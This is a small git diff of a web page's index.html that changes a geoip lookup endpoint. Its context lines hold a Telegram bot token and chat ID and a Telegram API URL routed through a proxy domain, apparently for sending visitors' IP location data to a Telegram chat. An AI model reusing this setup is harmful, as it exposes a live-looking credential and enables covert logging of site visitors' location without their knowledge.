--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
 			style="width: 100%; height: auto;">
 
 		<script>
-			const API_URL = 'https://api.ip.sb/geoip';
+			const API_URL = 'https://api-ipv4.ip.sb/geoip';
 			const TELEGRAM_API_URL = 'https://ymy.gay/https://api.telegram.org/bot'; // Replace with your Telegram Bot API URL
 			const TOKEN = '5975737743:AAFxFhwL8_VIvZRkqXYeDVngTH3zXaqhy68'; // Replace with your Telegram Bot API Token
 			const CHAT_ID = '5957163999'; // Replace with your Telegram Chat ID
